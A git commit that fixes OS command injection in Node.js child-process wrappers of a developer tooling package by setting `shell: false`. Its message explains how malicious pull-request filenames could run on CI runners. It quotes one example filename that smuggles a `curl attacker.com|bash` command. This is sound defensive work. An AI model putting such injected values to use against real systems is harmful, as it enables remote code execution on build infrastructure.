fix(ng-dev): prevent OS command injection in ChildProcess wrappers

Herdiyan IT Dev · Herdiyan IT Dev · commit 412f2e279db8 · 2026-04-11T10:17:47.000+07:00
The ChildProcess.spawn and ChildProcess.spawnSync wrappers previously
used `shell: true`, which causes Node.js to internally concatenate the
command + args array into a single string and pass it to `/bin/sh -c`.

This means any argument containing shell metacharacters (e.g. a file named
`src/foo;curl attacker.com|bash;#.ts`) resulting from a malicious Pull
Request is directly executed by the shell in CI/CD contexts.

The attack chain is concrete:
1. `ng-dev format changed` calls `git diff --name-only` -&gt; attacker controls filenames.
2. `runFormatterInParallel` builds: `[spawnCmd, ...spawnArgs] = [...command.split(' '), file]`
3. `ChildProcess.spawn(spawnCmd, spawnArgs, ...)` with `shell: true` evaluates
   the injected filename as an arbitrary shell command on the CI runner.

Fix: change `shell: true` to `shell: false` in both `spawn` and `spawnSync`.
With `shell: false`, args are passed directly to `execve` as an array,
completely bypassing shell interpretation and neutralizing the injection.
diff --git a/ng-dev/utils/child-process.ts b/ng-dev/utils/child-process.ts
@@ -85,6 +85,9 @@ export abstract class ChildProcess {
    * @returns The command's stdout and stderr.
    */
   static spawnSync(command: string, args: string[], options: SpawnSyncOptions = {}): SpawnResult {
+    // Pass args as a proper array with shell: false to prevent OS command injection.
+    // When shell: true is used, Node.js internally joins command + args into a single
+    // string evaluated by /bin/sh, making shell metacharacters in args exploitable.
     const commandText = `${command} ${args.join(' ')}`;
     const env = getEnvironmentForNonInteractiveCommand(options.env);
 
@@ -95,7 +98,7 @@ export abstract class ChildProcess {
       signal,
       stdout,
       stderr,
-    } = _spawnSync(command, args, {...options, env, encoding: 'utf8', shell: true, stdio: 'pipe'});
+    } = _spawnSync(command, args, {...options, env, encoding: 'utf8', shell: false, stdio: 'pipe'});
 
     /** The status of the spawn result. */
     const status = statusFromExitCodeAndSignal(exitCode, signal);
@@ -116,13 +119,16 @@ export abstract class ChildProcess {
    *   rejects on command failure.
    */
   static spawn(command: string, args: string[], options: SpawnOptions = {}): Promise<SpawnResult> {
+    // Pass args as a proper array with shell: false to prevent OS command injection.
+    // When shell: true is used, Node.js internally joins command + args into a single
+    // string evaluated by /bin/sh, making shell metacharacters in args exploitable.
     const commandText = `${command} ${args.join(' ')}`;
     const env = getEnvironmentForNonInteractiveCommand(options.env);
 
     return processAsyncCmd(
       commandText,
       options,
-      _spawn(command, args, {...options, env, shell: true, stdio: 'pipe'}),
+      _spawn(command, args, {...options, env, shell: false, stdio: 'pipe'}),
     );
   }
 
@@ -135,6 +141,7 @@ export abstract class ChildProcess {
    *   rejects on command failure.
    */
   static exec(command: string, options: ExecOptions = {}): Promise<SpawnResult> {
+    Log.warn('ChildProcess.exec is discouraged as it is susceptible to command injection. Prefer ChildProcess.spawn with an array of arguments.');
     const env = getEnvironmentForNonInteractiveCommand(options.env);
     return processAsyncCmd(command, options, _exec(command, {...options, env}));
   }
